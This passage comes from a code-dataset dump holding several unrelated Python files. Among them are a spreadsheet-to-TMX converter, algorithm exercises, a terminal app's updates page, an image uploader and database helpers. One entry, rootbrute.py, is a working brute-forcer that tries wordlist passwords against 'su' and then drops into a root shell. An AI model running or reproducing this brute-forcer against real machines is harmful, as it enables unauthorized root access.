\\n\\n\"\n\n body = \"\"\n if self.segments:\n for segment in self.segments:\n body += f\"\\n\"\n body += f\"{segment.source}\\n\"\n body += f\"{segment.target}\\n\"\n body += \"\\n\\n\"\n \n footer = \"
\\n\"\n footer += \"\\n\"\n footer += \"\\n\"\n\n return header, body, footer\n\nclass Segment:\n def __init__(self, id, source, target):\n self.id = id\n self.source = self.cleanStringForXML(source)\n self.target = self.cleanStringForXML(target)\n \n def cleanStringForXML(self, text, reverse=False):\n find_and_replace = {\n \"&\": \"&\",\n \"\\\"\": \""\",\n \"'\": \"'\",\n \"<\": \"<\",\n \">\": \">\"\n }\n \n text = str(text)\n for k, v in find_and_replace.items():\n if reverse:\n text = text.replace(v, k)\n else:\n text = text.replace(k, v)\n\n return text.strip()\n \nif __name__ == \"__main__\":\n import os\n import time\n \n ext_num = input(\"Select output format - [1]: TMX, [2]: XLIFF\\nEnter number: \")\n ext_map = {\n \"1\": \"tmx\",\n \"2\": \"xliff\"\n }\n try:\n for i in os.listdir():\n if \".xlsx\" in i:\n start_time = time.time()\n print(f\"Processing file {i}\")\n offline_case = OfflineCase(i)\n offline_case.convert(ext_map[ext_num])\n elapsed_time = round(time.time() - start_time, 2)\n print(f\"Success! Completed in {elapsed_time} seconds.\")\n input(\"Task completed. Press to close this window.\")\n except Exception as e:\n input(f\"An error occurred. {repr(e)}. Press to close this window.\")\n"},"size":{"kind":"number","value":4505,"string":"4,505"}}},{"rowIdx":829,"cells":{"max_stars_repo_path":{"kind":"string","value":"challenges/codility/lessons/q029/min_perimeter_rectangle_v001.py"},"max_stars_repo_name":{"kind":"string","value":"Joeffison/coding_challenges"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2023191"},"content":{"kind":"string","value":"#!/usr/bin/env python3\n\nfrom math import sqrt\n\n\ndef solution(n):\n \"\"\"\n Returns the minimal perimeter for a rectangle of area n.\n \"\"\"\n\n # given the sides a and b, the area of a rectangle is n = a*b and the perimeter is 2 * (a + b)\n # for a minimal perimeter, we have to minimize the difference between a and b\n for i in range(int(sqrt(n)), 0, -1):\n\n # a and b must be the closest possible to sqrt(n)\n if n % i == 0:\n return 2*(i + n//i)\n"},"size":{"kind":"number","value":453,"string":"453"}}},{"rowIdx":830,"cells":{"max_stars_repo_path":{"kind":"string","value":"rootbrute.py"},"max_stars_repo_name":{"kind":"string","value":"lucthienphong1120/full-45-bruteforce-tools"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2023280"},"content":{"kind":"string","value":"#!/usr/bin/python \n#Local Root BruteForcer \n\n#More Info: http://forum.darkc0de.com/index.php?action=vthread&forum=8&topic=1571\n \n#http://www.darkc0de.com \n#d3hydr8[at]gmail[dot]com \n \nimport sys \ntry: \n\timport pexpect \nexcept(ImportError): \n\tprint \"\\nYou need the pexpect module.\" \n\tprint \"http://www.noah.org/wiki/Pexpect\\n\" \n\tsys.exit(1) \n \n#Change this if needed. \nLOGIN_ERROR = 'su: incorrect password' \n \ndef brute(word): \n\tprint \"Trying:\",word \n\tchild = pexpect.spawn ('su') \n\tchild.expect ('Password: ') \n\tchild.sendline (word) \n\ti = child.expect (['.+\\s#\\s',LOGIN_ERROR]) \n\tif i == 0: \n\t\tprint \"\\n\\t[!] 
Root Password:\",word \n\t\tchild.sendline ('whoami') \n\t\tprint child.before \n\t\tchild.interact() \n\t#if i == 1: \n\t\t#print \"Incorrect Password\" \n \nif len(sys.argv) != 2: \n\tprint \"\\nUsage : ./rootbrute.py \" \n\tprint \"Eg: ./rootbrute.py words.txt\\n\" \n\tsys.exit(1) \n \ntry: \n\twords = open(sys.argv[1], \"r\").readlines() \nexcept(IOError): \n \tprint \"\\nError: Check your wordlist path\\n\" \n \tsys.exit(1) \n \nprint \"\\n[+] Loaded:\",len(words),\"words\" \nprint \"[+] BruteForcing...\\n\" \nfor word in words: \n\tbrute(word.replace(\"\\n\",\"\"))"},"size":{"kind":"number","value":1136,"string":"1,136"}}},{"rowIdx":831,"cells":{"max_stars_repo_path":{"kind":"string","value":"figures/figure_5.py"},"max_stars_repo_name":{"kind":"string","value":"mhsung/fuzzy-set-dual"},"max_stars_count":{"kind":"number","value":2,"string":"2"},"id":{"kind":"string","value":"2023412"},"content":{"kind":"string","value":"#!/usr/bin/env python\n# ()\n# March 2018\n\nimport os, sys\nBASE_DIR = os.path.normpath(\n os.path.join(os.path.dirname(os.path.abspath(__file__))))\n\nfrom collect_results import *\n\n\nif __name__ == '__main__':\n synset_partial_idx_pairs = [\n ('Airplane', 579),\n ('Car', 57),\n ('Chair', 7251),\n ('Guitar', 5),\n ('Lamp', 117),\n ('Rifle', 371),\n ('Sofa', 1184),\n ('Table', 1414),\n ('Watercraft', 294)]\n\n top_k = 5\n\n out_name = os.path.splitext(os.path.basename(__file__))[0]\n out_dir = os.path.join(BASE_DIR, out_name)\n\n collect_complementarity_results(synset_partial_idx_pairs, top_k, out_dir)\n\n"},"size":{"kind":"number","value":721,"string":"721"}}},{"rowIdx":832,"cells":{"max_stars_repo_path":{"kind":"string","value":"Plugins/Configs/Pages/Updates.py"},"max_stars_repo_name":{"kind":"string","value":"CHHOrganization/BlackDoc"},"max_stars_count":{"kind":"number","value":3,"string":"3"},"id":{"kind":"string","value":"2022970"},"content":{"kind":"string","value":"import os, time, sys\nfrom Plugins.Configs.Settings import *\n\ndef Updates_Page():\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n clearConsole()\n Index_Banner()\n for char in Banner_msg:\n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.0)\n print(Dark_Blue + BG_Dark_Green + \"\")\n for char in Line:\n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.500)\n print(Rest + Bright_Green + BG_Dark_Blue)\n for char in Endl:\n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.0)\n print(Rest +\"\")\n\n print(Bright_Yellow) \n Auto_Text_15 = \"Updates\"\n for char in Auto_Text_15: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.1)\n print(\"\")\n\n #The Org Message\n print(Bright_Yellow)\n Auto_Text_11 = \"The Organization Updates\"\n for char in Auto_Text_11: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.1)\n print(\"\")\n\n print(Dark_Cyan)\n Auto_Text_12 = \"Date: 20/02/2022 Updates\"\n for char in Auto_Text_12: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.3)\n print(\"\")\n\n print(Bright_Green +\"The Org is finally in it's own level of\\n\\\ntrust with it's members to share and make use of this script. 
This Script\")\n print(\"Containing The Org data as our members\\n\\\nagreed to share their public cryptic info throw the BlackDoc\")\n print(Bright_Red +\"Please Note; All information in this\\n\\\ndocument is classified to unmembers of\\n\\\nThe Org\")\n print(\"Make sure you dont share this script!\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n \n #New Members Updates\n print(Bright_Yellow)\n Auto_Text_13 = \"New Members List\"\n for char in Auto_Text_13: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.1)\n print(\"\")\n\n print(Dark_Cyan)\n Auto_Text_14 = \"Date: 21/03/2022 Updates \"\n for char in Auto_Text_14: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.3)\n print(\"\")\n\n print(Dark_Magenta + Ms1 + Bright_Red +\". Theres No New Members...\") \n print(Bright_Green +\"Use Menu -> Then Cammand; 'Memberships'\\n\\\nTo See The Full Memberships Borad.\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n #About The BlackDoc\n print(Bright_Yellow)\n Auto_Text_17 = \"About BlackDoc Updates\"\n for char in Auto_Text_17: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.1)\n print(\"\")\n print(Bright_Cyan)\n Auto_Text_16 = \"Date: 22/02 - 01/03/2022 Updates\"\n for char in Auto_Text_16: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.3)\n print()\n\n print(Bright_Green +\"About The Script.\")\n print(\"You using;\")\n print(\"Name: BlackDocument.py\")\n print(\"Version: V0.0.03\")\n print(\"Security Level: \"+ Ms1 + \".03\")\n print(\"Developed By: CHHOrg\")\n print(\"Promoted By: DarkDoor\")\n print(\"Released Date: 20/02/2022\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n \n print(Bright_Yellow)\n Auto_Text_18 = \"Errors, Fixed Errors and New Features\\n\\\nUpdates\"\n for char in Auto_Text_18: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.1)\n print(\"\")\n\n print(Dark_Cyan)\n Auto_Text_10 = \"Date: 21/02/2022 Updates\\n\\\n[(Old Version)]\"\n for char in Auto_Text_10: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.3)\n print(\"\")\n\n print(Bright_Red)\n Auto_Text_9 = \"[+] -> FIXED Errors\"\n for char in Auto_Text_9: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.5)\n print(\"\")\n\n print(Bright_Magenta + Ms1 + Bright_Green +\"). Fixed all spelling errors\")\n print(Bright_Magenta + Ms2 + Bright_Green +\"). Fixed all cutting words\")\n print(Bright_Magenta + Ms3 + Bright_Green +\"). Fixed underlinings Lan\")\n print(Bright_Magenta + Ms4 + Bright_Green +\"). Fixed underlining divisions\")\n print(\"for each page in our Menu\")\n print(Bright_Magenta + Ms5 + Bright_Green +\"). Fixed directory folder in Zip\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n print(Bright_Red)\n Auto_Text_8 = \"[+] -> New Features\"\n for char in Auto_Text_8: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.5)\n print(\"\")\n\n print(Bright_Magenta + Ms1 + Bright_Green +\"). We added Colors\")\n print(Bright_Magenta + Ms2 + Bright_Green +\"). We added Banner\")\n print(Bright_Magenta + Ms3 + Bright_Green +\"). 
We added more error messages\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n print(Bright_Cyan + \"\")\n Auto_Text_7 = \"Date: 22/02 - 01/03/2022 Updates\\n\\\n([Previous Version])\"\n for char in Auto_Text_7: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.3)\n \n print(Bright_Red + \"\")\n Auto_Text_6 = \"[+] -> FIXED Errors\"\n for char in Auto_Text_6: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.5)\n print(\"\")\n\n print(Bright_Magenta + Ms1 + Bright_Green +\"). Fixed Menu Borders\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n print(Bright_Red + \"\")\n Auto_Text_5 = \"[+] -> New Features\"\n for char in Auto_Text_5: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.5)\n print(\"\")\n\n print(Bright_Magenta + Ms1 + Bright_Green +\"). We added new menu items\")\n print(Bright_Magenta + Ms2 + Bright_Green +\"). We added script animation\")\n print(Bright_Magenta + Ms3 + Bright_Green +\"). We added new security for exits\")\n print(Bright_Magenta + Ms4 + Bright_Green +\"). We added a Bot\")\n print(Bright_Magenta + Ms5 + Bright_Green +\"). We added Commands\")\n print(Bright_Magenta + Ms6 + Bright_Green +\"). We added Org Rules at More. in Menu\")\n print(Bright_Magenta + Ms7 + Bright_Green +\"). We added Loading Progress\")\n \n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n print(Bright_Red +\"\")\n Auto_Text_4 = \"[+] -> Errors\"\n for char in Auto_Text_4: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.5)\n print(\"\")\n print(Bright_Magenta + Ms1 + Bright_Green +\"). Chat Option in Menu for Termux/Linux\\n\\\nIs not working!!!\\n\\\n\\n\\\nNote: In Termux we run TermuxRun.sh after\\n\\\nInstallations.\")\n print(Bright_Magenta + Ms2 + Bright_Green +\"). Other Items in Menu they are\\n\\\nUnavailable\")\n print(Bright_Magenta + Ms3 + Bright_Green +\"). The script is still under Developing\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n print(Bright_Cyan + \"\")\n Auto_Text_7 = \"Date: 01/03 - 21/03/2022 Updates\\n\\\n([New Version])\"\n for char in Auto_Text_7: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.3)\n \n print(Bright_Red + \"\")\n Auto_Text_6 = \"[+] -> FIXED Errors\"\n for char in Auto_Text_6: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.5)\n print(\"\")\n\n print(Bright_Magenta + Ms1 + Bright_Green +\"). Fixed Login Security\")\n print(Bright_Magenta + Ms2 + Bright_Green +\"). Fixed More Menu Logout System\")\n print(Bright_Magenta + Ms3 + Bright_Green +\"). Fixed Directory Of Game; EvilNinja\")\n print(Bright_Magenta + Ms3 + Bright_Green +\"). Fixed Updates Page (Updates Numbering)\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n print(Bright_Red + \"\")\n Auto_Text_5 = \"[+] -> New Features\"\n for char in Auto_Text_5: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.5)\n print(\"\")\n\n print(Bright_Magenta + Ms1 + Bright_Green +\"). We added loop\")\n print(Bright_Magenta + Ms2 + Bright_Green +\"). We we changed colors\")\n print(Bright_Magenta + Ms3 + Bright_Green +\"). We advanced login security\")\n print(Bright_Magenta + Ms4 + Bright_Green +\"). We added a game called EvilNinja\")\n print(Bright_Magenta + Ms5 + Bright_Green +\"). We modified the program\")\n print(Bright_Magenta + Ms6 + Bright_Green +\"). We made more menu items available\")\n print(Bright_Magenta + Ms7 + Bright_Green +\"). 
Hacking Lessons Will Be Available\\n\\\nDate; 01/04/2022\")\n \n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n\n print(Bright_Red +\"\")\n Auto_Text_4 = \"[+] -> Errors\"\n for char in Auto_Text_4: \n sys.stdout.write(char)\n sys.stdout.flush()\n time.sleep(0.5)\n print(\"\")\n print(Bright_Magenta + Ms1 + Bright_Green +\"). Chat Option in Menu for Termux/Linux\\n\\\nIs not working!!!\\n\\\n\\n\\\nNote: BlackDoc Might Be In Github\\n\\\nBut Is Still Under developing.\")\n print(Bright_Magenta + Ms1 + Bright_Green +\"). Other Items in Menu they are\\n\\\nUnavailable\")\n print(Bright_Magenta + Ms2 + Bright_Green +\"). The script is still under Developing\")\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n print(Dark_Blue + BG_Dark_Green + Line + Rest)\n"},"size":{"kind":"number","value":9158,"string":"9,158"}}},{"rowIdx":833,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/moz_image/main.py"},"max_stars_repo_name":{"kind":"string","value":"mozkzki/moz-image"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024489"},"content":{"kind":"string","value":"import os\nimport sys\nimport uuid\nimport requests\nfrom contextlib import contextmanager\nfrom dotenv import load_dotenv\nfrom PIL import Image as pimage\n\nGYAZO_UPLOAD_URL = \"https://upload.gyazo.com/api/upload\"\n\n\n@contextmanager\ndef download(url: str):\n image = _download_image(url)\n save_file_path = _save_image(image)\n try:\n yield save_file_path\n finally:\n os.remove(save_file_path)\n\n\ndef _download_image(url: str, timeout: int = 10) -> bytes:\n response = requests.get(url, allow_redirects=False, timeout=timeout)\n if response.status_code != 200:\n e = Exception(\"HTTP status: \" + str(response.status_code))\n raise e\n\n content_type = response.headers[\"content-type\"]\n if \"image\" not in content_type:\n e = Exception(\"Content-Type: \" + str(content_type))\n raise e\n\n return response.content\n\n\ndef _make_save_file_path() -> str:\n file_name = str(uuid.uuid4())\n save_file_path = os.path.join(\"/tmp/mmimage/\", file_name)\n return save_file_path\n\n\ndef _save_image(image: bytes) -> str:\n save_file_path = _make_save_file_path()\n\n # ディレクトリが存在しない場合は作る\n os.makedirs(os.path.dirname(save_file_path), exist_ok=True)\n\n with open(save_file_path, \"wb\") as fout:\n fout.write(image)\n\n return save_file_path\n\n\ndef resize(path: str, *, width: int = 302) -> None:\n if os.path.isfile(path) is not True:\n print(\"file does not exists. 
path={}\".format(path), file=sys.stderr)\n return\n\n img = pimage.open(path)\n\n # 保存先のファイル名作成\n # フォーマット指定がないとエラーになる\n new_path = \"\".join((path, \".\", img.format))\n\n # 画像の解像度を取得して、リサイズする高さを計算\n img_width, img_height = img.size\n resize_width = float(width)\n resize_height = resize_width / img_width * img_height\n\n # 画像をリサイズ\n img = img.resize((int(resize_width), int(resize_height)))\n img.save(new_path)\n\n # 古いファイルと入れ替える\n os.remove(path)\n os.rename(new_path, path)\n\n\ndef upload_to_gyazo(path: str, access_token: str = None) -> str:\n image = open(path, \"rb\")\n files = {\"imagedata\": image}\n # files = {\"imagedata\": (\"filename\", image, \"image\")}\n\n # 引数指定がなければ環境変数からaccess token読み込み\n if access_token is None:\n load_dotenv(verbose=True)\n access_token = os.environ.get(\"gyazo_access_token\", \"dummy_token\")\n\n data = {\"access_token\": access_token}\n response = requests.post(GYAZO_UPLOAD_URL, files=files, data=data)\n if response.reason == \"Unauthorized\" and response.status_code == 401:\n print(\n \"[error] gyazo access token is invalid!\",\n \"please set correct token by environment variable .\",\n )\n return \"\"\n\n url = response.json()[\"url\"]\n print(\"------------- URL: \", url)\n return url\n"},"size":{"kind":"number","value":2744,"string":"2,744"}}},{"rowIdx":834,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/other/sbl.py"},"max_stars_repo_name":{"kind":"string","value":"sgherbst/simple-base-lib"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024217"},"content":{"kind":"string","value":"import sblc\nimport os\n\n\n# set working dir to SBL's dataPath\n# fix(later): should do this directly from C++ code\nos.chdir( sblc.dataPath() )\n\n\n# convert a python value to a string value suitable to for SBL commands/configs\ndef strProc( val ):\n valStr = str( val );\n if valStr == \"False\":\n valStr = \"0\"\n if valStr == \"True\":\n valStr = \"1\"\n return valStr\n\n\n# represents an entry in a configuration file\nclass ConfigEntry:\n \n # basic constructor\n def __init__( self, _name, _value, _comment ):\n self.name = _name\n self.value = _value\n self.comment = _comment\n\n\n# represents a configuration file\nclass Config:\n\n # basic constructor\n def __init__( self ):\n self.__dict__[ \"_entries\" ] = []\n\n # add a config entry\n def __setattr__( self, name, value ):\n if not name.startswith( \"_\" ):\n found = False\n for e in self._entries: # fix(later): use dict (though want to maintain order)\n if e.name == name:\n e.value = value \n found = True\n if not found:\n self._entries.append( ConfigEntry( name, value, \"\" ) ) \n\n # read a config entry\n def __getattr__( self, name ):\n if not name.startswith( \"_\" ):\n for e in self._entries: # fix(later): use dict (though want to maintain order)\n if e.name == name:\n return e.value\n raise AttributeError\n\n # create a string version suitable for passing to an SBL command\n def __str__( self ):\n s = \"\"\n for e in self._entries:\n if e.name:\n s += e.name + \"=\" + strProc( e.value ) + \" \"\n return s\n\n # load a configuration file (in SBL format)\n def load( self, fileName ):\n f = open( fileName, \"r\" )\n if f:\n for line in f:\n line = line.strip()\n\n # get comments/meta-data\n preComment = line\n comment = \"\"\n if '[' in line:\n split = line.split( '[', 1 )\n preComment = split[ 0 ]\n comment = \"[\" + split[ 1 ]\n elif '#' in line:\n split = line.split( '#', 1 )\n preComment = split[ 0 ]\n comment = \"#\" + split[ 1 ]\n\n # get name 
and value (if any)\n name = \"\"\n value = \"\"\n split = preComment.split()\n if len( split ) >= 2:\n name = split[ 0 ]\n value = split[ 1 ]\n\n # append an entry (even for blank lines)\n self._entries.append( ConfigEntry( name, value, comment ) )\n\n # save this configuration file (in SBL format)\n def save( self, fileName ):\n f = open( fileName, \"w\" )\n if f:\n for e in self._entries:\n if e.name:\n f.write( e.name )\n f.write( \" \" )\n f.write( strProc( e.value ) )\n if e.comment:\n f.write( \" \" )\n if e.comment:\n f.write( e.comment )\n f.write( \"\\n\" )\n \n\n# provides a simple interface to SBL commands\nclass CommandRouter:\n\n # return true if user has requested that the current command stop running\n def checkCommandCancel( self ):\n return sblc.checkCommandEvents()\n\n # display a message\n def disp( self, indent, message ):\n sblc.disp( 0, indent, message )\n\n # display a warning\n def warning( self, message ):\n sblc.disp( 1, 0, message )\n\n # display a fatal error (will terminate program)\n def fatalError( self, message ):\n sblc.disp( 2, 0, message )\n\n # assume all other method calls are commands; send to SBL C++ command system\n def __getattr__( self, name ):\n if not name.startswith( \"_\" ):\n def runCommand( *args, **keywords ):\n cmdStr = name + \" \" + \" \".join( [strProc( a ) for a in args] )\n sblc.execCommand( cmdStr )\n return runCommand\n else:\n raise AttributeError\n"},"size":{"kind":"number","value":4214,"string":"4,214"}}},{"rowIdx":835,"cells":{"max_stars_repo_path":{"kind":"string","value":"aiobot/exceptions/__init__.py"},"max_stars_repo_name":{"kind":"string","value":"thedyrn/aio-vkbot"},"max_stars_count":{"kind":"number","value":2,"string":"2"},"id":{"kind":"string","value":"2023480"},"content":{"kind":"string","value":"\nfrom .vk_error import VkError\nfrom .aiobot_error import NoneSessionError\n__all__ = [VkError, NoneSessionError]"},"size":{"kind":"number","value":111,"string":"111"}}},{"rowIdx":836,"cells":{"max_stars_repo_path":{"kind":"string","value":"binary-search/python/binary_search.py"},"max_stars_repo_name":{"kind":"string","value":"abccdabfgc/algorithms-java"},"max_stars_count":{"kind":"number","value":16,"string":"16"},"id":{"kind":"string","value":"2023290"},"content":{"kind":"string","value":"#!/usr/bin/env python3\n\nimport os, json\n\ndef binary_search(key, arr):\n lo = 0\n hi = len(arr) - 1\n while lo <= hi:\n mid = lo + (hi - lo) // 2;\n if key < arr[mid]:\n hi = mid - 1\n elif key > arr[mid]:\n lo = mid + 1\n else:\n return mid\n return -1\n\ndef main():\n with open(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'input.json')) as f:\n for input in json.load(f):\n r = binary_search(input['key'], input['array'])\n print('binary_search(%s, %s) => %s' % (input['key'], input['array'], r))\n if input['result'] != r:\n raise Error('failed. 
expected = %s, actual = %s' % (input['result'], r))\n\nif __name__ == '__main__':\n main()\n"},"size":{"kind":"number","value":782,"string":"782"}}},{"rowIdx":837,"cells":{"max_stars_repo_path":{"kind":"string","value":"test/test_chained_func_call.py"},"max_stars_repo_name":{"kind":"string","value":"mad-center/bilibili-mad-crawler"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2023173"},"content":{"kind":"string","value":"def foo(next=True):\n print('foo')\n return next\n\n\ndef bar():\n print('bar')\n return False\n\n\nfoo(next=True) and bar()\nprint('=' * 50)\nfoo(next=False) and bar()\n"},"size":{"kind":"number","value":169,"string":"169"}}},{"rowIdx":838,"cells":{"max_stars_repo_path":{"kind":"string","value":"number_terms.py"},"max_stars_repo_name":{"kind":"string","value":"mvgugaev/Python-Algorit-Stepik"},"max_stars_count":{"kind":"number","value":11,"string":"11"},"id":{"kind":"string","value":"2024530"},"content":{"kind":"string","value":"import time\n\n# Задача: По данному числу 1 <= n <=10^9 найдите максимальное число k,\n# для которого nn можно представить как сумму k различных натуральных слагаемых.\n# Выведите в первой строке число k, во второй — k слагаемых.\n\n# Input:\n# 6\n# 120 30\n# Output:\n# 3\n# 1 2 3\n# Time: 4.935264587402344e-05 s\n\n\ndef main():\n n = int(input())\n\n # Get start time\n start = time.time()\n\n result, part = [], 1\n\n while n != 0:\n while part * 2 >= n and part != n:\n part += 1\n\n result.append(part)\n n -= part\n\n part += 1\n\n print(str(len(result)) + '\\n' + ' '.join([str(i) for i in result]))\n\n # Show time\n print('Time: ', time.time() - start, 's')\n\n\nif __name__ == \"__main__\":\n main()\n"},"size":{"kind":"number","value":737,"string":"737"}}},{"rowIdx":839,"cells":{"max_stars_repo_path":{"kind":"string","value":"init_db.py"},"max_stars_repo_name":{"kind":"string","value":"MardanovTimur/aiochat"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024326"},"content":{"kind":"string","value":"from sqlalchemy import create_engine, MetaData\n\nfrom chatapp.settings import config\nfrom chatapp.models import user, friends\nfrom aiopg.sa.engine import aiopg\n\nDSN = 'postgresql://{user}:{password}@{host}:{port}/{database}'\n\n\ndef create_tables(engine):\n \"\"\" Initialize the database\n \"\"\"\n meta = MetaData()\n meta.create_all(bind=engine, tables=[user, friends])\n\n\ndef sample_data(engine):\n \"\"\" Creates the sample data in database\n \"\"\"\n conn = engine.connect()\n conn.execute(user.insert(), [\n {\n 'username': 'timurmardanov97',\n },\n {\n 'username': 'jax02',\n },\n ])\n conn.close()\n\n\nasync def init_pg(app):\n conf = app['config']['postgres']\n engine = await aiopg.sa.create_engine(**conf)\n app['db'] = engine\n\n\nasync def close_pg(app):\n app['db'].close()\n await app['db'].wait_closed()\n\n\nif __name__ == '__main__':\n db_url = DSN.format(**config['postgres'])\n engine = create_engine(db_url)\n\n create_tables(engine)\n sample_data(engine)\n"},"size":{"kind":"number","value":1035,"string":"1,035"}}},{"rowIdx":840,"cells":{"max_stars_repo_path":{"kind":"string","value":"terminio/commandexecutor/cd.py"},"max_stars_repo_name":{"kind":"string","value":"SourishS/terminio"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2023741"},"content":{"kind":"string","value":"from terminio.commandexecutor.commandexecutor import CommandExecutor\n\nclass cd(CommandExecutor):\n def __init__(self, 
session):\n super(cd, self).__init__(session)\n self.grammer = {\n 'directory' : { \n 'description' : 'Directory to list',\n 'type' : 'string'\n }\n }\n\n\n def execute_command(self, cwd, args):\n if args.directory is None:\n \treturn cwd\n elif args.directory == '.':\n return cwd\n elif args.directory == '..':\n return '/'.join(cwd.split('/')[0:-1])\n else:\n \treturn args.directory"},"size":{"kind":"number","value":634,"string":"634"}}},{"rowIdx":841,"cells":{"max_stars_repo_path":{"kind":"string","value":"binding.gyp"},"max_stars_repo_name":{"kind":"string","value":"tylerflint/node-kstat"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2024035"},"content":{"kind":"string","value":"{\n 'targets': [\n {\n 'target_name': 'kstat',\n 'sources': [ 'kstat.cc' ],\n 'libraries': [ '-lkstat' ],\n 'cflags_cc': [ '-Wno-write-strings' ],\n 'cflags_cc!': [ '-fno-exceptions' ],\n }\n ]\n}\n"},"size":{"kind":"number","value":220,"string":"220"}}},{"rowIdx":842,"cells":{"max_stars_repo_path":{"kind":"string","value":"convertmusic/db/meta.py"},"max_stars_repo_name":{"kind":"string","value":"groboclown/music-uploader"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2024191"},"content":{"kind":"string","value":"\nimport sqlite3\nimport os\n\n\nclass Table(object):\n def __init__(self, conn, table_name, columns):\n \"\"\"\n columns: list of columns, which is itself a list of:\n column name, column SQL type, default value, is index.\n First column is always the primary key (never inserted)\n \"\"\"\n object.__init__(self)\n self.__name = table_name\n self.__conn = conn\n self.__identity_column_name = columns[0][0]\n self.__insert_column_names = []\n # skip the unique column id\n for c in columns[1:]:\n self.__insert_column_names.append(c[0])\n upgrade = False\n c = conn.execute(\"SELECT name FROM sqlite_master WHERE type='table' AND name=?;\", [table_name])\n for row in c:\n if row[0] == table_name:\n upgrade = True\n c.close()\n if upgrade:\n # TODO allow upgrade\n pass\n else:\n col_sql = []\n for c in columns:\n s = '{0} {1}'.format(c[0], c[1])\n if len(c) > 2 and c[2] is not None:\n s += ' DEFAULT {0}'.format(c[2])\n if len(c) > 3 and c[3] is not None:\n s += ' {0}'.format(c[3])\n col_sql.append(s)\n sql = 'CREATE TABLE {0} ({1})'.format(table_name, ','.join(col_sql))\n conn.execute(sql)\n conn.commit()\n\n def insert(self, *values):\n vs = []\n for n in values:\n vs.append('?')\n c = self.__conn.execute(\"INSERT INTO {0} ({1}) VALUES ({2})\".format(\n self.__name, ','.join(self.__insert_column_names), ','.join(vs)\n ), values)\n r = c.lastrowid\n c.close()\n self.__conn.commit()\n return r\n\n def delete_by_id(self, id):\n try:\n c = self.__conn.execute(\"DELETE FROM {0} WHERE {1} = ?\".format(\n self.__name, self.__identity_column_name\n ), [id])\n ret = c.rowcount\n c.close()\n self.__conn.commit()\n return ret > 0\n except:\n print(\"PROBLEM with sql: {0}\".format(\n \"DELETE FROM {0} WHERE {1} = ?\".format(\n self.__name, self.__identity_column_name)\n ))\n raise\n\n def delete_where(self, where_clause, *values):\n c = self.__conn.execute('DELETE FROM {0} WHERE {1}'.format(\n self.__name, where_clause), values)\n ret = c.rowcount\n c.close()\n self.__conn.commit()\n return ret\n\n def close(self):\n self.__conn = None\n\n def __del__(self):\n self.close()\n\n\nclass TableDef(object):\n def __init__(self, name, columns=None):\n object.__init__(self)\n self.__name = name\n self.__columns = []\n if columns is not 
None:\n self.__columns.extend(columns)\n\n def with_column(self, name, type, default=None, index=None):\n self.__columns.append([name, type, default, index])\n return self\n\n @property\n def name(self):\n return self.__name\n\n @property\n def columns(self):\n return self.__columns\n\n\nclass Db(object):\n def __init__(self, filename, table_defs):\n \"\"\"\n table_defs: list of TableDef instances.\n \"\"\"\n object.__init__(self)\n self.__conn = sqlite3.connect(filename)\n self.__tables = {}\n for td in table_defs:\n assert isinstance(td, TableDef)\n t = Table(self.__conn, td.name, td.columns)\n self.__tables[td.name] = t\n\n def __del__(self):\n self.close()\n\n def close(self):\n if self.__conn is not None:\n self.__conn.close()\n self.__conn = None\n\n def query(self, query, *values):\n \"\"\"\n Returns iterable rows.\n \"\"\"\n # print(\"DEUBG query: {0} {1}\".format(repr(query), repr(values)))\n v2 = []\n for v in values:\n if isinstance(v, str) and '\\\\' in v:\n v = v.replace('\\\\', 